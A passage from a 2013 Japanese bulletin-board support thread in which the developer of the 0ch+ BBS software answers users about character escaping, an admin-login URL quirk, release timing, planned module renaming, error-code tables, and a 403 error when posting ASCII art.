355 :0ch+開発担当 ◆0chp.sx.ik :2013/05/06(月) 16:13:56.81 ID:NbW7qBDc0
>>351
>>354訂正です
「;」 → 「&#59」
「;123」 → 「&#59123」 ※書き換え不可

356 :名無しさん@ぜろちゃんねるプラス:2013/05/06(月) 16:20:04.73 ID:0v7EnDJ60
>>354
了解です。ありがとうございました!

357 :0ch+開発担当 ◆0chp.sx.ik :2013/05/06(月) 16:36:08.38 ID:NbW7qBDc0
>>352
いろいろ試してみたところ再現出来ました。

http://user:pass@xxxx.wkeya.com/test/admin.cgi
のようなアドレスにアクセスしていませんか?
表面上は「xxxx.wkeya.com/test/admin.cgi」のように見えていると思います。

http://xxxx.wkeya.com/test/admin.cgi」にアクセスしなおしてみてください。
ブックマークに登録してあればそれも直してみてください。

358 :名無しさん@ぜろちゃんねるプラス:2013/05/08(水) 01:31:10.67 ID:MsxjlEW60
http://zerochplus.sourceforge.jp/
からダウンロードしようとしてもファイルが見つからないんですが
修正版のリリースはまだ先ですか

359 :0ch+開発担当 ◆0chp.sx.ik :2013/05/08(水) 21:58:16.63 ID:AB+ITYSs0
>>358
管理画面の通知機能で緊急通知を行った関係で不具合が生じています。

今週末までにはリリースできるように何とか頑張ろうと思います。

360 :名無しさん@ぜろちゃんねるプラス:2013/05/09(木) 00:16:28.01 ID:SopSL3lY0
http://yakin.38-ch.net/test/read.cgi/zerochplus/1323693544/14
>バージョン0.8.xからは適切なモジュール名を付け直そうと思っています。

との事ですがファイル名、パッケージ名の変更なのでしょうか?
プラグインやモジュール類を改造して使用させて頂いているので気になります。

361 :0ch+開発担当 ◆0chp.sx.ik :2013/05/09(木) 00:31:38.28 ID:WEdoPseA0
>>360
ファイル名・パッケージ名の両方を変更します。

ただし0.8.xでは旧名でも動作するシステムを導入するつもりなので
バージョンアップで動作しなくなることはほとんどないと思います。
0.8.xはいわゆる移行期間になります。

その時にはSTDERRに以下のようなメッセージを出力するようにします。
  Use 'tools.pl' instead of 'galadriel.pl'. at bbs.cgi line 113
  Use 'TOOLS::new' instead of 'GALADRIEL::new'. at bbs.cgi line 117

362 :名無しさん@ぜろちゃんねるプラス:2013/05/09(木) 00:45:31.52 ID:SopSL3lY0
>>361
詳細ありがとうございます。
移行期間があるのは非常に助かります。0.8.xが楽しみになりました。

363 :名無しさん@ぜろちゃんねるプラス:2013/05/09(木) 19:25:03.22 ID:iEugSuuci
>>360

おお!
コレはうれしい。

あとうろ覚えだけど、前にコード追ってた時、システム関連オブジェクトが二種類あって、
$SYSとか$oSYSとか$oSysとかモジュールによって違う変数が設定されてて、
名前も似てるしまぎらわしいなーと思った気がする。

364 :名無しさん@ぜろちゃんねるプラス:2013/05/09(木) 21:01:53.87 ID:DOgDu0JA0
BB2Cから大き目のAAを貼ろうとすると落ちるんですが……

365 :0ch+開発担当 ◆0chp.sx.ik :2013/05/09(木) 23:22:55.00 ID:WEdoPseA0
>>363
>$SYSとか$oSYSとか$oSysとか
これもチマチマと統一しているところです。

>>364
"落ちる"というのはbbs.cgiが落ちる(反応しない/500エラー)ということですか?
もしそうなら、貼ろうとしたAAなど具体的に教えて下さい。

アプリBB2Cが落ちるということであれば0ch+ではどうしようもないと思います。

366 :名無しさん@ぜろちゃんねるプラス:2013/05/10(金) 12:17:38.60 ID:1UUAc4pI0
エラーログに記述されているエラーコードの一覧はどこかにあるのでしょうか?

367 :0ch+開発担当 ◆0chp.sx.ik :2013/05/10(金) 20:23:40.87 ID:Sfk6l0og0
>>366
./test/info/errmsg.cgi が番号とメッセージの対応表です。
ソースコード中の定数は ./test/module/constant.pl にあります。

管理画面のエラーログのページでは、次のリリース0.7.2から
エラーコードにメッセージが併記されるようになります。

368 :名無しさん@ぜろちゃんねるプラス:2013/05/10(金) 20:39:02.92 ID:1UUAc4pI0
>>367
ありがとうございます。

369 :名無しさん@ぜろちゃんねるプラス:2013/05/10(金) 21:08:31.12 ID:OBfAGNhE0
>>365
わかりませんが、どの専ブラウザアプリでも貼れなかったり落ちたりします

AAはこのURLの上のAAです

http://tanjoin.hatenablog.com/entry/20110829/1314604156

370 :名無しさん@ぜろちゃんねるプラス:2013/05/10(金) 21:19:58.33 ID:OBfAGNhE0
>>369
PCの専ブラから書き込んだところ以下のようなエラーを確認しました

HTTP/1.1 403 Forbidden

371 :0ch+開発担当 ◆0chp.sx.ik :2013/05/10(金) 21:26:40.33 ID:Sfk6l0og0
>>369-370
1つの可能性ですが、特定の掲示板にのみ貼れないのであれば
その掲示板の管理者によって「キムチ」がNGワードとして扱われているのかもしれません。

305KB
READ.CGI - 0ch+ BBS 0.7.5 20220323
ぜろちゃんねるプラス